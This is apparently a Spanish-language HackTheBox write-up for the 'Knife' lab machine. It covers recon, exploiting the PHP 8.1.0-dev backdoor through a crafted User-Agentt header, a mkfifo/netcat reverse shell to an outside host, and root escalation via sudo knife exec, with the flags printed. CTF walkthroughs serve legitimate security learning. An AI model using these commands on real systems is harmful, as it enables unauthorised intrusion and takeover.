Knife es una maquina de HackTheBox, en esta maquina encontramos que esta utilizando una version en desarrollo de PHP la cual fue afectada con un backdoor, por medio de este logramos ingresar tras ejecutar una shell inversa. Finalmente escalamos privilegios utilizando los permisos de la herramienta Knife con un script en ruby.
Nombre |
Knife |
OS |
Linux |
Puntos |
20 |
Dificultad |
Facil |
IP |
10.10.10.242 |
Maker |
MrKN16H7 |
Matrix
|
{
"type":"radar",
"data":{
"labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
"datasets":[
{
"label":"User Rate", "data":[4.4, 3.8, 4.9, 5.1, 6.2],
"backgroundColor":"rgba(75, 162, 189,0.5)",
"borderColor":"#4ba2bd"
},
{
"label":"Maker Rate",
"data":[0, 0, 0, 0, 0],
"backgroundColor":"rgba(154, 204, 20,0.5)",
"borderColor":"#9acc14"
}
]
},
"options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
"angleLines":{"color":"rgba(255, 255, 255,0.6)"},
"gridLines":{"color":"rgba(255, 255, 255,0.6)"}
}
}
}
|
RECON
NMAP
Escaneo de puertos con nmap nos muestra el puerto http (80) y el puerto ssh (22) abiertos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
# Nmap 7.91 scan initiated Wed May 26 19:44:57 2021 as: nmap -Pn -sV -sC -p22,80 -oN scan_ports 10.10.10.242
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 19:45:11 2021 -- 1 IP address (1 host up) scanned in 13.39 seconds
|
HTTP
Encontramos una pagina aparentemente estatica.
GOBUSTER
Utilizamos gobuster para busqueda de directorios y archivos, pero solo muestra una direccion ya conocida y otra, que no podemos acceder de formar remota.
1
2
3
|
π ~/htb/knife ❯ gobuster dir -u http://10.10.10.242/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 30 -x php,html,txt,json,xml
/index.php (Status: 200) [Size: 5815]
/server-status (Status: 403) [Size: 277]
|
En los headers del sitio encontramos PHP/8.1.0-dev
, al investigar esta version vemos un exploit que permite la ejecucion de comandos a traves de un Header el cual esta relacionado a un backdoor que recientemente fue detectado en un commit del repositorio de PHP en desarrollo, lo que permite ejecutar comandos de forma remota.
1
2
3
4
5
|
HTTP/1.1 200 OK
Date: Thu, 27 May 2021 00:22:54 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
|
USER - JAMES
La ejecucion de comandos se dá tras enviar un comando en el header User-Agentt: zerodiumsystem('whoami');
con lo cual se logra ejecutar comandos y muestra su salida. En la salida de curl vemos la ejecucion del comando whoami
al usuario “James”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
π ~/htb/knife ❯ curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"| html2text
james
* About EMA
* /
* Patients
* /
* Hospitals
* /
* Providers
* /
* E-MSO
***** At EMA we're taking care to a whole new level . . . *****
****** Taking care of our ******
|
Ejecutamos una shell inversa y logramos obtener una shell y la flag user.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 8081 >/tmp/f
james@knife:/$ whoami
whoami
james
james@knife:/$ cd
cd
james@knife:~$ ll
ll
total 40
drwxr-xr-x 5 james james 4096 May 18 13:20 ./
drwxr-xr-x 3 root root 4096 May 6 14:44 ../
lrwxrwxrwx 1 james james 9 May 10 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25 2020 .bashrc
drwx------ 2 james james 4096 May 6 14:45 .cache/
drwxrwxr-x 3 james james 4096 May 6 16:32 .local/
-rw-r--r-- 1 james james 807 Feb 25 2020 .profile
-rw-rw-r-- 1 james james 66 May 7 14:16 .selected_editor
drwx------ 2 james james 4096 May 18 13:20 .ssh/
-r-------- 1 james james 33 May 26 20:25 user.txt
james@knife:~$ cat user.txt
cat user.txt
7b3e1804cce95710f8730ca6fb1a086f
james@knife:~$
|
PRIVILEGE ESCALATION
Ejecutando sudo -l -l
vemos que tenemos permisos root (sudo) para ejecutar el comando knife
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
james@knife:~$ sudo -l -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
Sudoers entry:
RunAsUsers: root
Options: !authenticate
Commands:
/usr/bin/knife
james@knife:~$ file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:~$ file /opt/chef-workstation/bin/knife
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
james@knife:~$ ls -lah /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 12K Feb 15 22:06 /opt/chef-workstation/bin/knife
james@knife:~$
|
Utilizamos knife exec con un script para obtener una shell root y la flag root.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
james@knife:~$ echo "system('/bin/bash')" > script.rb
james@knife:~$ cat script.rb
system('/bin/bash')
james@knife:~$ sudo /usr/bin/knife exec script.rb
root@knife:/home/james# whoami
root
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# ll
total 56
drwx------ 7 root root 4096 May 18 13:26 ./
drwxr-xr-x 20 root root 4096 May 18 13:25 ../
lrwxrwxrwx 1 root root 9 May 8 16:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3137 May 7 11:12 .bashrc
drwx------ 2 root root 4096 May 7 14:47 .cache/
drwx------ 3 root root 4096 May 18 13:20 .chef/
-rwxr-xr-x 1 root root 105 May 8 16:46 delete.sh*
drwxr-xr-x 3 root root 4096 May 7 11:13 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 1024 May 8 11:13 .rnd
-r-------- 1 root root 33 May 26 20:25 root.txt
-rw-r--r-- 1 root root 66 May 8 16:46 .selected_editor
drwxr-xr-x 3 root root 4096 May 6 14:44 snap/
drwx------ 2 root root 4096 May 6 14:44 .ssh/
-rw------- 1 root root 2413 May 18 13:25 .viminfo
root@knife:~# cat root.txt
e2eee2ca199ac8ea06e9578969576706
root@knife:~#
|